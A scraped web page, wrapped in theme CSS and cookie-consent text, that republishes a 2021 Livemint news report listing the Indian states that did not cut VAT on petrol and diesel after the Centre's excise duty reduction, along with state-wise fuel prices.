(min-width: 992px){#content #secondary{float:right;width:40%}}@media (min-width: 1050px){#content #secondary{width:30%;padding-left:15px;padding-right:0}}html{font-size:16px;font-family:"Raleway";font-weight:400}html body{color:black;font-family:"Raleway"}html body input,html body button{font-family:inherit}a{text-decoration:none;color:black;transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear}a:visited{color:black}a:hover{color:#ff0036}p a{color:#ff0036}p a:visited,p a:hover{color:#ff0036}p a:hover{font-weight:800}.twp-author-meta{display:flex;align-items:center;font-weight:600;flex-wrap:wrap;margin-left:-5 x;margin-right:-5px;font-size:14px;font-style:italic}.twp-author-meta span,.twp-author-meta a{display:inline-block}.twp-author-meta .twp-author-caption,.twp-author-meta .twp-post-date{padding-left:5px;padding-right:5px}.twp-author-meta .twp-author-image{width:35px;margin-left:5px;margin-right:5px;vertical-align:middle}.twp-author-meta .twp-author-image amp-img{border-radius:100%}.twp-title-with-dashed{position:relative;padding-left:10px;line-height:1}.twp-title-with-dashed:before{position:absolute;content:"";left:0;top:0;height:100%;width:4px}.twp-categories-with-bg ul.cat-links{margin-left:-5px;margin-right:-5px}.twp-categories-with-bg ul.cat-links li{padding-left:5px;padding-right:5px}.twp-categories-with-bg ul li{line-height:1;display:inline-block}.twp-categories-with-bg ul li a{display:inline-block;height:25px;padding:0 5px;line-height:25px;font-size:.9rem;transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear;font-weight:600;position:relative}.twp-categories-with-bg ul li a:before{content:"";position:absolute;top:100%;left:0;border-right:4px solid;border-bottom:4px solid transparent;width:0;z-index:1}.twp-categories-with-bg ul li a:visited{color:white}.twp-categories-with-bg ul li a:hover{color:#cfd8dc}.twp-categories-with-bg.twp-categories-with-bg-primary a{color:white}.twp-categories-with-bg.twp-categories-with-bg-primary a:before{border-right-color:#ff0036}.twp-close-icon{width:50px;position:relative;display:inline-block;cursor:pointer;height:100%;transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear;vertical-align:middle}@media (min-width: 1050px){.twp-close-icon:hover{-webkit-animation:rotate-center .3s linear both;-o-animation:rotate-center .3s linear both;-moz-animation:rotate-center .3s linear both;animation:rotate-center .3s linear both}}.twp-close-icon.twp-close-icon-sm{width:20px}.twp-close-icon.twp-close-icon-sm span{width:20px}.twp-close-icon span{display:block;position:absolute;width:30px;height:3px;z-index:5;top:50%;border-radius:5px;transform:rotate(45deg)}.twp-close-icon span:last-child{transform:rotate(135deg)}.twp-close-icon.twp-close-icon-white span{background-color:white}@media (min-width: 1050px){.twp-close-icon.twp-rotate-90:hover{-webkit-animation:rotate-partial .3s linear both;-o-animation:rotate-partial .3s linear both;-moz-animation:rotate-partial .3s linear both;animation:rotate-partial .3s linear both}}.twp-menu-icon{position:relative;height:20px;width:30px;cursor:pointer;transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear}.twp-menu-icon:before{position:absolute;display:block;content:"";height:3px;width:80%;left:0;top:50%;transform:translateY(-50%)}.twp-menu-icon span:before,.twp-menu-icon span:after{position:absolute;display:block;content:"";height:3px;width:100%;left:0}.twp-menu-icon span:before{top:1px}.twp-menu-icon span:after{bottom:1px}.twp-menu-icon.twp-menu-icon-white:before{background-color:white}.twp-menu-icon.twp-menu-icon-white span:before,.twp-menu-icon.twp-menu-icon-white span:after{background-color:white}.twp-mobile-menu{position:fixed;width:100%;height:100%;z-index:10;top:0;bottom:0;left:-100%;background-color:black;padding:30px;color:white;overflow-y:auto;transition:all .5s ease}@media (min-width: 768px){.twp-mobile-menu{width:300px}}.twp-mobile-menu .twp-mobile-close-icon{text-align:right}.twp-mobile-menu ul li a{display:block;font-weight:600;font-size:1.2rem;line-height:1;padding:10px 0;color:white}.twp-mobile-menu ul .sub-menu{padding-left:15px}.twp-mobile-menu ul .sub-menu a{font-size:14px}.twp-mobile-menu .brand-home{display:none}.twp-body-overlay{transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear}.twp-scroll-top{display:none;transition:all 1s ease;-webkit-transition:all 1s ease;-moz-transition:all 1s ease}@media (min-width: 768px){.twp-scroll-top{position:fixed;z-index:2;right:-200px;display:block;bottom:30px}}.twp-scroll-top span{display:inline-block;background-color:black;color:white;padding:5px 10px;font-size:20px}@media (min-width: 1050px){.twp-scroll-top span{padding:10px 15px}}.twp-scroll-top span i{transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear}.twp-scroll-top span:hover{background-color:#ff0036}.twp-scroll-top span:hover i{transform:scale(1.2);-webkit-transform:scale(1.2);-moz-transform:scale(1.2)}.twp-search-field-wrapper{display:flex;flex-wrap:wrap}@media (min-width: 1050px){.twp-search-field-wrapper{max-width:700px;margin:0 auto}}.twp-search-field-wrapper .twp-search-field{flex:0 0 calc(100% - 50px);max-width:calc(100% - 50px)}.twp-search-field-wrapper .twp-search-field form{display:flex;flex-wrap:wrap}.twp-search-field-wrapper .twp-search-field form label{flex:0 0 70%;max-width:70%}.twp-search-field-wrapper .twp-search-field form label input{width:100%;border:0;border-radius:0;padding:15px 30px;background-color:white}.twp-search-field-wrapper .twp-search-field form input[type=submit]{width:30%;color:white;background-color:black;border:0;cursor:pointer;font-size:1rem;padding:0 15px;font-weight:600;border-radius:0}@media (min-width: 768px){.twp-search-field-wrapper .twp-search-field form input[type=submit]{font-size:20px}}.twp-search-field-wrapper .twp-close-icon-section{flex:0 0 50px;max-width:50px;padding-left:10px;padding-right:10px}.twp-social-share-section{display:flex;flex-wrap:wrap}.twp-social-share-section .twp-author-meta{padding-top:10px}.twp-social-share-section .twp-author-meta.m-0{margin-left:0;margin-right:0}.twp-topbar .twp-title-with-arrow{vertical-align:middle;padding:0 30px;position:relative;height:40px;line-height:40px;color:white;z-index:1}.twp-topbar .twp-title-with-arrow:after{content:"";display:block;position:absolute;top:50%;right:-20px;transform:translateY(-50%);border-style:solid;border-width:10px;border-color:transparent transparent transparent #ff0036}.twp-topbar .twp-current-date{height:40px;line-height:40px;padding:0 15px;background-color:black;color:white;vertical-align:middle;width:100%;text-align:center}@media (min-width: 576px){.twp-topbar .twp-current-date{width:initial;text-align:initial}}.twp-topbar{background-color:#cfd8dc}.twp-topbar .twp-breaking-news-section a{color:black}.twp-topbar .twp-breaking-news-section a:visited{color:black}.twp-topbar .twp-breaking-news-section a:hover{color:#ff0036}.twp-breaking-news-section .twp-ticket-pin-slider:not(.slick-initialized){opacity:0;visibility:hidden;max-height:40px;transition:opacity 1s ease;-webkit-transition:opacity 1s ease}.twp-breaking-news-section .twp-ticket-pin-slider{visibility:visible;opacity:1;transition:opacity 1s ease;-webkit-transition:opacity 1s ease}@media (min-width: 576px){.twp-topbar{height:40px}}.twp-topbar .twp-topbar-content-left{width:100%}@media (min-width: 576px){.twp-topbar .twp-topbar-content-left{width:calc(100% - 300px)}}.twp-topbar .twp-topbar-content-left .twp-title-with-arrow{display:none}@media (min-width: 1050px){.twp-topbar .twp-topbar-content-left .twp-title-with-arrow{display:block}}.twp-topbar .twp-topbar-content-left .twp-breaking-news-section{height:40px;overflow:hidden;display:none}@media (min-width: 768px){.twp-topbar .twp-topbar-content-left .twp-breaking-news-section{display:block}}.twp-navigation .twp-nav-menu-section .twp-site-features .header-theme-mode a,.twp-navigation .twp-nav-menu-section .twp-site-features .twp-search,.twp-navigation .twp-nav-menu-section .twp-site-features .twp-trending{padding:0 15px;height:40px;line-height:40px;background-color:white;color:black;cursor:pointer;transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear}.twp-navigation .twp-nav-menu-section .twp-site-features .header-theme-mode a:hover,.twp-navigation .twp-nav-menu-section .twp-site-features .twp-search:hover,.twp-navigation .twp-nav-menu-section .twp-site-features .twp-trending:hover{background-color:#cfd8dc}.twp-navigation .twp-article-list{display:none;background-color:white;color:black}.twp-navigation .twp-article-list a{line-height:1.2;color:black}.twp-navigation .twp-article-list a:visited{color:black}.twp-navigation .twp-article-list a:hover{color:#ff0036}.desktop ul.twp-nav-menu{display:flex;flex-wrap:wrap}.desktop ul.twp-nav-menu > li a{position:relative;display:block}.desktop ul.twp-nav-menu > li > a:before{background-color:white;-webkit-animation:scale-in-center .5s cubic-bezier(.25,.46,.45,.94) both;-o-animation:scale-in-center .5s cubic-bezier(.25,.46,.45,.94) both;-moz-animation:scale-in-center .5s cubic-bezier(.25,.46,.45,.94) both;animation:scale-in-center .5s cubic-bezier(.25,.46,.45,.94) both}.desktop ul.twp-nav-menu > li > a:hover{color:black}.desktop ul.twp-nav-menu > li > a:hover:before{content:""}.desktop .twp-nav-menu a{text-transform:uppercase;font-size:13px;padding:0 15px;height:40px;line-height:40px;color:white;font-weight:800}.desktop .twp-nav-menu .brand-home a{position:relative;color:black;background-color:white;font-size:35px}.desktop .twp-nav-menu .brand-home a:before{position:absolute;width:100%;height:5px;content:"";display:block;left:0;top:-5px;background-color:black}.desktop .twp-nav-menu .brand-home a:hover{background-color:#cfd8dc}.desktop ul.twp-nav-menu > li{position:relative}.desktop ul.twp-nav-menu > li .sub-menu{position:absolute;top:110%;left:0;width:220px;background-color:black;opacity:0;height:0;overflow:hidden;visibility:hidden;transition:all 1s ease;-webkit-transition:all 1s ease;-moz-transition:all 1s ease;z-index:3}.desktop ul.twp-nav-menu > li .sub-menu a{display:block;border-left-style:solid;border-left-width:1px;border-top-style:solid;border-top-width:1px;border-color:#cfd8dc;color:white}.desktop ul.twp-nav-menu > li .sub-menu a:visited{color:white}.desktop ul.twp-nav-menu > li .sub-menu a:hover{color:#cfd8dc}.desktop ul.twp-nav-menu > li:hover .sub-menu,.desktop ul.twp-nav-menu > li:focus-within .sub-menu{top:100%;opacity:1;height:auto;overflow:visible;visibility:visible}.desktop ul.twp-nav-menu > li{position:relative}.desktop ul.twp-nav-menu > li .sub-menu > li{position:relative}.desktop ul.twp-nav-menu > li .sub-menu > li .sub-menu{top:20%;left:100%;overflow:hidden;visibility:hidden;transition:all 1s ease;-webkit-transition:all 1s ease;-moz-transition:all 1s ease}.desktop ul.twp-nav-menu > li .sub-menu > li:hover .sub-menu,.desktop ul.twp-nav-menu > li .sub-menu > li:focus-within .sub-menu{opacity:1;height:auto;top:0;overflow:visible;visibility:visible}.desktop ul.twp-nav-menu > li{position:relative}.desktop ul.twp-nav-menu > li .sub-menu > li{position:relative}.desktop ul.twp-nav-menu > li .sub-menu > li .sub-menu{top:20%;left:100%;overflow:hidden;visibility:hidden;transition:all 1s ease;-webkit-transition:all 1s ease;-moz-transition:all 1s ease}.desktop ul.twp-nav-menu > li .sub-menu > li:hover .sub-menu,.desktop ul.twp-nav-menu > li .sub-menu > li:focus-within .sub-menu{opacity:1;height:auto;top:0;overflow:visible;visibility:visible}.desktop ul.twp-nav-menu > li{position:relative}.desktop ul.twp-nav-menu > li .sub-menu > li{position:relative}.desktop ul.twp-nav-menu > li .sub-menu > li .sub-menu > li .sub-menu{top:20%;left:100%;overflow:hidden;visibility:hidden;transition:all 1s ease;-webkit-transition:all 1s ease;-moz-transition:all 1s ease}.desktop ul.twp-nav-menu > li .sub-menu > li .sub-menu > li:hover .sub-menu,.desktop ul.twp-nav-menu > li .sub-menu > li .sub-menu > li:focus-within .sub-menu{opacity:1;height:auto;overflow:visible;visibility:visible;top:0}.desktop div.twp-nav-menu > ul{display:flex;flex-wrap:wrap}.desktop div.twp-nav-menu > ul > li{position:relative}.desktop div.twp-nav-menu > ul > li a{position:relative;display:block}.desktop div.twp-nav-menu > ul > li > a:before{background-color:white;-webkit-animation:scale-in-center .5s cubic-bezier(.25,.46,.45,.94) both;-o-animation:scale-in-center .5s cubic-bezier(.25,.46,.45,.94) both;-moz-animation:scale-in-center .5s cubic-bezier(.25,.46,.45,.94) both;animation:scale-in-center .5s cubic-bezier(.25,.46,.45,.94) both}.desktop div.twp-nav-menu > ul > li > a:hover{color:black}.desktop div.twp-nav-menu > ul > li > a:hover:before{content:""}.twp-nav-menu-section .twp-progress-bar{position:absolute;left:0;height:8px;bottom:-8px;background-color:#cfd8dc;z-index:2;transition:width .2s ease;-webkit-transition:width .2s ease;-moz-transition:width .2s ease}.twp-navigation .twp-search-field-section{background:#cfd8dc;padding:30px 0;display:none}@media (min-width: 576px){.twp-navigation .twp-search-field-section{padding:30px}}.twp-navigation .twp-nav-menu-section{background-color:black;position:relative}.twp-navigation .twp-nav-menu-section:after{position:absolute;content:"";height:8px;width:100%;display:block;left:0;bottom:-8px}.twp-navigation .twp-nav-menu-section .twp-wrapper{justify-content:space-between;margin-left:-15px;margin-right:-15px;flex-wrap:nowrap}.twp-navigation .twp-nav-menu-section .twp-menu-section,.twp-navigation .twp-nav-menu-section .twp-site-features{padding-left:15px;padding-right:15px}.twp-navigation .twp-nav-menu-section .twp-menu-section{align-items:center}.twp-navigation .twp-nav-menu-section .twp-menu-section .twp-nav-menu li{display:none}@media (min-width: 1050px){.twp-navigation .twp-nav-menu-section .twp-menu-section .twp-nav-menu li{display:block}}.twp-navigation .twp-nav-menu-section .twp-menu-section .twp-nav-menu li.brand-home{display:block}.twp-navigation .twp-nav-menu-section .twp-menu-section .twp-menu-icon-section{padding:0 15px}@media (min-width: 1050px){.twp-navigation .twp-nav-menu-section .twp-menu-section .twp-menu-icon-section{display:none}}.twp-navigation .twp-nav-menu-section .twp-site-features{display:flex;flex-wrap:wrap;flex-shrink:0}.twp-navigation .twp-nav-menu-section .twp-site-features .twp-search,.twp-navigation .twp-nav-menu-section .twp-site-features .twp-trending{padding:0 15px}.twp-navigation .twp-nav-menu-section .twp-site-features .twp-search a,.twp-navigation .twp-nav-menu-section .twp-site-features .twp-trending a{color:black}.twp-navigation .twp-nav-menu-section .twp-site-features .header-theme-mode a{display:inline-block;color:black}.twp-navigation .twp-nav-menu-section .twp-site-features .twp-trending{background-color:#ff0036;color:white;padding:0 20px}.twp-navigation .twp-nav-menu-section .twp-site-features .twp-trending:hover{background-color:black}.twp-navigation .twp-nav-menu-section .twp-site-features i{line-height:1}.twp-article-list .twp-article-border{border-bottom-style:solid;border-bottom-width:1px;border-color:#cfd8dc;padding-top:10px;padding-bottom:10px}.twp-article-list .twp-article-border:hover{background-color:#f8f9fa}.twp-article{display:flex}.twp-article .twp-units{font-size:40px;padding:0 10px}.twp-article .twp-description{padding:0 10px}.twp-article .twp-description h4{margin:0}.twp-article .twp-description h4 a{line-height:1.2;color:black}.twp-article .twp-description h4 a:visited{color:black}.twp-article .twp-description h4 a:hover{color:#ff0036}.twp-related-post .twp-image-section,.twp-related-post .twp-desc{flex:0 0 100%;max-width:100%}.twp-related-post .twp-image-section{min-height:200px}@media (min-width: 768px){.twp-related-post .twp-image-section{flex:0 0 30%;max-width:30%}}.twp-related-post .twp-image-section a{height:100%}.twp-related-post .twp-desc{padding:30px 15px}@media (min-width: 768px){.twp-related-post .twp-desc{flex:70%;max-width:70%}}.twp-related-post .twp-desc h3{margin-top:10px;margin-bottom:0}.twp-related-post .twp-desc h3 a{overflow:hidden;text-overflow:ellipsis;display:-webkit-box;-webkit-box-orient:vertical;box-orient:vertical;line-clamp:2;-webkit-line-clamp:2;word-break:break-word}.twp-related-post .twp-desc .twp-categories-with-bg ul li{padding-top:10px}.twp-ticket-pin{padding:0 15px;height:40px}.twp-ticket-pin .ticket-pin-wrapper{display:-webkit-box;display:-moz-box;display:-ms-flexbox;display:-webkit-flex;display:flex;align-items:center}.twp-ticket-pin .twp-image-section{width:80px;background-color:gray;height:40px}.twp-ticket-pin .twp-image-section .data-bg{height:100%}.twp-ticket-pin .twp-articles-title{padding-left:10px;width:calc(100% - 80px);font-size:14px;font-weight:600;line-height:1.2}.twp-ticket-pin .twp-articles-title a{overflow:hidden;text-overflow:ellipsis;display:-webkit-box;-webkit-box-orient:vertical;box-orient:vertical;line-clamp:2;-webkit-line-clamp:2;word-break:break-word}.twp-single-next-post{position:relative;z-index:1;padding:30px 15px 45px;border-bottom-style:solid;border-bottom-width:2px;border-color:#f8f9fa}.twp-single-next-post:before{position:absolute;content:"";display:block;left:0;right:0;bottom:0;z-index:1;height:150px;background:-webkit-linear-gradient(top,rgba(255,255,255,0) 0%,white 86%,white 87%,white 100%);background:linear-gradient(top,rgba(255,255,255,0) 0%,white 86%,white 87%,white 100%)}.twp-single-next-post .twp-next-post,.twp-single-next-post .twp-categories-with-bg,.twp-single-next-post .twp-author-meta,.twp-single-next-post .twp-caption{padding-top:15px}.twp-single-next-post .twp-next-post a{display:inline-block;font-weight:600}.twp-single-next-post .twp-next-post a i{padding:0 10px}.twp-single-next-post h2{margin-top:15px;margin-bottom:0;border-bottom-style:solid;border-bottom-width:2px;border-color:#f8f9fa;padding-bottom:5px}.twp-single-next-post .twp-caption{font-style:italic}.twp-single-next-post .twp-image-section{position:relative;height:200px;overflow:hidden;text-align:center;margin-top:15px}.twp-single-next-post .twp-image-section amp-img{box-shadow:0 0 5px 5px rgba(238,238,238,.6);border-radius:5px;padding:15px}.twp-related-post-section .twp-related-post,.twp-related-post-section .twp-title{margin-top:30px}.twp-related-post-section .twp-title{margin-bottom:0}@media (min-width: 1050px){.twp-related-post-section .twp-related-post-list{padding-left:60px}}.twp-article-post{box-shadow:0 0 10px 2px #cfd8dc;padding:0 15px 15px;margin-top:30px}.twp-article-post .entry-header .twp-categories-with-bg,.twp-article-post .entry-header .entry-title,.twp-article-post .entry-header .twp-author-meta{padding-top:15px}.twp-article-post .entry-header .entry-title{margin:0}.twp-article-post .single-excerpt p{margin-top:15px;margin-bottom:0;border-left-style:solid;border-left-width:4px;padding:15px;text-align:justify;font-style:italic}.twp-article-post .entry-content{margin:0}.twp-article-post .entry-content p{margin-top:15px;margin-bottom:0}.twp-article-post .entry-content h1,.twp-article-post .entry-content h2,.twp-article-post .entry-content h3,.twp-article-post .entry-content h4{margin-top:15px;margin-bottom:0}.widget ul{margin-left:-15px;margin-right:-15px}.widget ul li{padding:10px 15px;font-weight:600}.widget ul li:nth-child(odd){background-color:#f8f9fa}.widget ul li.menu-item-has-children{padding-bottom:0}.widget ul li.menu-item-has-children li{font-size:14px}.widget ul li.menu-item-has-children .sub-menu{margin-top:10px}.widget .twp-categories-with-bg li:nth-child(odd){background-color:transparent}.twp-footer-widget-section .widget li:nth-child(odd){background-color:transparent}.widget .search-form label{width:calc(100% - 90px);float:left;padding-right:5px}.widget .search-form label input{width:100%;height:45px;border-radius:0;padding:0 15px;border-color:#cfd8dc}.widget .search-form .search-submit{width:90px;height:45px;float:left;font-size:1rem;border-radius:0;border:0;cursor:pointer;font-weight:600;padding:0;background-color:black;color:white;transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear}.widget .search-form .search-submit:hover{background-color:#ff0036}.twp-footer-widget-section .widget .search-form .search-submit:hover{background-color:white;color:black}.widget{border-style:solid;border-width:1px;border-color:#cfd8dc;margin-top:30px;padding:15px 15px 0}.widget.widget_search{padding-bottom:15px}.widget-area .widget .twp-col-4,.twp-footer-widget-section .widget .twp-col-4{flex:0 0 100%;max-width:100%;padding-left:0;padding-right:0}.widget-area .widget .container,.twp-footer-widget-section .widget .container{padding:0}.widget-area .widget .twp-row,.twp-footer-widget-section .widget .twp-row{margin:0}.site-content{padding:15px 0 45px 0}.twp-breadcrumbs{font-weight:600;padding:15px 0;background-color:#f8f9fa;border-bottom-style:solid;border-bottom-width:1px;border-color:#f8f9fa;margin-top:8px}.twp-breadcrumbs ul{display:flex;flex-wrap:wrap}.twp-breadcrumbs ul li{padding:0 60px 0 0;position:relative}.twp-breadcrumbs ul li:after{content:"";display:block;font-family:fontAwesome;position:absolute;right:23px;top:50%;transform:translateY(-50%);-webkit-transform:translateY(-50%);-moz-transform:translateY(-50%)}.twp-breadcrumbs ul li:last-child:after{display:none}.twp-footer-social-section{background-color:black;color:white}.twp-footer-social-section a{color:white}.twp-footer-social-section .twp-footer-social{padding-bottom:15px}.twp-footer-widget-section{background-color:black;color:white;padding-bottom:30px}.twp-footer-widget-section .twp-footer-border{border-bottom-style:solid;border-bottom-width:1px;border-color:white}.twp-footer-widget-section a{color:white}.twp-footer-widget-section a:visited{color:white}.twp-footer-widget-section a:hover{color:#ff0036}.twp-footer-widget-section .widget{border:0}.site-footer{background-color:black;color:white;text-align:center;padding:15px;font-weight:600}.site-footer a{color:white}.site-footer a:hover{color:#ff0036}.twp-newsletter-section{background-color:#cfd8dc;z-index:2;transition:all 1s ease;-webkit-transition:all 1s ease;-moz-transition:all 1s ease;color:black;padding:30px}@media (min-width: 1050px){.twp-newsletter-section{width:500px;padding:5px 15px 15px;position:fixed;right:-50%;bottom:100px}}.twp-newsletter-section .twp-close-icon-section{display:none}@media (min-width: 1050px){.twp-newsletter-section .twp-close-icon-section{padding-top:10px;text-align:right;display:block}}.twp-newsletter-section h2,.twp-newsletter-section p{margin-top:10px;margin-bottom:0}.twp-site-branding{padding-top:15px;padding-bottom:30px}.twp-site-branding.data-bg{background-color:transparent}.twp-site-branding .twp-logo{text-align:center}.twp-site-branding .twp-logo .site-title,.twp-site-branding .twp-logo .site-description,.twp-site-branding .twp-logo .twp-image-wrapper{margin-top:15px;margin-bottom:0;line-height:1}.twp-site-branding .twp-logo .site-title{font-size:3rem}.twp-site-branding .twp-logo .site-description{font-size:1.5rem}.twp-site-branding .twp-logo amp-img,.twp-site-branding .twp-logo .site-title,.twp-site-branding .twp-logo .site-description{transition:all .3s linear;-webkit-transition:all .3s linear;-moz-transition:all .3s linear}.twp-site-branding .twp-logo amp-img:hover,.twp-site-branding .twp-logo .site-title:hover,.twp-site-branding .twp-logo .site-description:hover{transform:scale(.9);-webkit-transform:scale(.9);-moz-transform:scale(.9)}.twp-article-list{padding:30px 0}.twp-article-list .twp-article-header{padding:10px 15px;position:relative;background-color:#cfd8dc}.twp-article-list .twp-article-header h3{margin:0;color:black}.twp-article-list .twp-article-header .twp-close-icon-section{height:30px;position:absolute;right:0;top:50%;transform:translateY(-50%)}.site-title,.site-description{position:absolute;clip:rect(1px,1px,1px,1px)}#amp-mobile-version-switcher{left:0;position:absolute;width:100%;z-index:100}#amp-mobile-version-switcher>a{background-color:#444;border:0;color:#eaeaea;display:block;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;font-weight:600;padding:15px 0;text-align:center;-webkit-text-decoration:none;text-decoration:none}#amp-mobile-version-switcher>a:active,#amp-mobile-version-switcher>a:focus,#amp-mobile-version-switcher>a:hover{-webkit-text-decoration:underline;text-decoration:underline}.cookielawinfo-column-1{width:25%}.cookielawinfo-column-3{width:15%}.cookielawinfo-column-4{width:50%}table.cookielawinfo-winter{font:85% "Lucida Grande","Lucida Sans Unicode","Trebuchet MS",sans-serif;padding:0;margin:10px 0 20px;border-collapse:collapse;color:#333;background:#f3f5f7}table.cookielawinfo-winter a{color:#3a4856;text-decoration:none;border-bottom:1px solid #c6c8cb}table.cookielawinfo-winter a:visited{color:#777}table.cookielawinfo-winter a:hover{color:#000}table.cookielawinfo-winter thead th{background:#3a4856;padding:15px 10px;color:#fff;text-align:left;font-weight:normal}table.cookielawinfo-winter tbody{border-left:1px solid #eaecee;border-right:1px solid #eaecee}table.cookielawinfo-winter tbody{border-bottom:1px solid #eaecee}table.cookielawinfo-winter tbody td,table.cookielawinfo-winter tbody th{padding:10px;background:url("https://motorcyclewash.com/wp-content/plugins/cookie-law-info/legacy/images/td_back.gif") repeat-x;text-align:left}table.cookielawinfo-winter tbody tr{background:#f3f5f7}table.cookielawinfo-winter tbody tr:hover{background:#eaecee;color:#111}@media (max-width:800px){table.cookielawinfo-row-cat-table td,table.cookielawinfo-row-cat-table th{width:23%;font-size:12px;word-wrap:break-word}table.cookielawinfo-row-cat-table .cookielawinfo-column-4{width:45%}}.cookielawinfo-row-cat-table{width:99%;margin-left:5px}.amp-wp-bf126db:not(#_#_#_#_#_){visibility:hidden;position:absolute;left:-9999px;overflow:hidden}.amp-wp-1cec2f6:not(#_#_#_#_#_){height:1px}.amp-wp-ceb598f:not(#_#_#_#_#_){margin:0px 5px 0px 0px} /*# sourceURL=amp-custom.css */</style><link rel="canonical" href="https://motorcyclewash.com/no-reduction-in-vat-in-these-states-after-centres-excise-duty-cut-full-list-here.html"><script type="application/ld+json">{"@context":"http://schema.org","publisher":{"@type":"Organization","name":"MotorCycle","logo":{"@type":"ImageObject","url":"https://motorcyclewash.com/wp-content/uploads/2021/09/cropped-default-1.png"}},"@type":"BlogPosting","mainEntityOfPage":"https://motorcyclewash.com/no-reduction-in-vat-in-these-states-after-centres-excise-duty-cut-full-list-here.html","headline":"No reduction in VAT in these states after Centre\u0026#8217;s excise duty cut. Full list here","datePublished":"2021-11-05T22:48:17+00:00","dateModified":"2021-11-05T22:48:17+00:00","author":{"@type":"Person","name":"Shaqil Heaton"},"image":"https://images.livemint.com/img/2021/11/05/600x338/20a1e630-3df1-11ec-9aab-f350f4cce7b2_1636130666442_1636130678371.jpg"}</script></head><body data-rsssl=1> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>No reduction in VAT in these states after Centre’s excise duty cut. Full list here – MotorCycle

No reduction in VAT in these states after Centre’s excise duty cut. Full list here

Shaqil Heaton

After the central government reduced the excise duty on petrol and diesel by ₹5 and ₹10 respectively, 22 states and union territories also chose to cut the Value Added Tax (VAT) on the motor fuels, providing relief to customers.  However, there are14 states and union territories that have not undertaken […]

After the central government reduced the excise duty on petrol and diesel by 5 and 10 respectively, 22 states and union territories also chose to cut the Value Added Tax (VAT) on the motor fuels, providing relief to customers. 

However, there are14 states and union territories that have not undertaken any reduction in VAT, said the ministry of petroleum in a statement on Friday. 

The states include Maharashtra, NCT of Delhi, West Bengal, Tamil Nadu, Telangana, Andhra Pradesh, Kerala, Meghalaya, Andaman and Nicobar, Jharkhand, Odisha, Chattisgarh, Punjab and Rajasthan.

On the hand, the most reduction in the petrol prices has been seen in the UT of Ladakh, where the prices have come down by 13.43. 

It is followed by Karnataka and Puducherry, where petrol rates have decreased by 13.35 and Rs12.85.

Further, the most reduction for diesel also has been undertaken by UT of Ladakh, leading to price coming down by 19.61 per litre, followed by Karnataka and Puducherry.

The additional reduction, on top of the excise duty cut, is the lowest in Uttarakhand.

After duty changes, the costliest petrol is sold in Rajasthan at 111.10 per litre (Jaipur), followed by Mumbai ( 109.98) and Andhra Pradesh ( 109.05). The fuel is below 100-a-litre-mark in most BJP ruled states baring Karnataka ( 100.58), Bihar ( 105.90), Madhya Pradesh ( 107.23) and Ladakh ( 102.99).

Similarly, the costliest diesel is now sold in Rajasthan at 95.71 a litre (Jaipur), followed by Andhra Pradesh ( 95.18) and Mumbai ( 94.14).

The cheapest diesel is in Mizoram at 79.55 a litre. `

Petrol costs 103.97 per litre in Delhi, and diesel is sold for 86.67 per litre.

VAT rates differ from state to state, leading to differential rates of fuel.

The central government said that the excise duty cut announced on Wednesday night was the highest-ever reduction in excise duty. 

“It rolls back a part of the 13 and 16 per litre increase in taxes on petrol and diesel effected between March 2020 and May 2020 to avoid passing on to consumers the sharp fall in international oil prices at the onset of the Covid-19 pandemic,” it said. 

That hike in excise duty had taken central taxes on petrol to their highest level of 32.9 per litre and that on diesel to 31.8 a litre.

The total increase in petrol price since the 5 May 2020, decision of the government to raise excise duty to record levels had totalled 38.78 per litre. Diesel rates have, during this period, gone up by 29.03 per litre.

 

Subscribe to Mint Newsletters

* Enter a valid email

* Thank you for subscribing to our newsletter.

Never miss a story! Stay connected and informed with Mint.
Download
our App Now!!

https://www.livemint.com/news/india/petrol-diesel-prices-no-reduction-in-vat-in-these-states-after-centre-s-excise-duty-cuts-full-list-here-11636129929491.html

Next Post

Why F1 is stuck with its "anti-embarrassment" engine penalty rules

If one of them does need to take further fresh elements – and recent events suggest that Hamilton is closer to the edge than his rival – it could tip the balance in such a tight world championship. Of course a championship is won and lost over a full season, […]

Subscribe US Now

CookieDurationDescription
cookielawinfo-checkbox-analytics11 monthsThis cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checkbox-functional11 monthsThe cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checkbox-necessary11 monthsThis cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
cookielawinfo-checkbox-others11 monthsThis cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-performance11 monthsThis cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
viewed_cookie_policy11 monthsThe cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.
Functional
Performance
Analytics
Advertisement
Others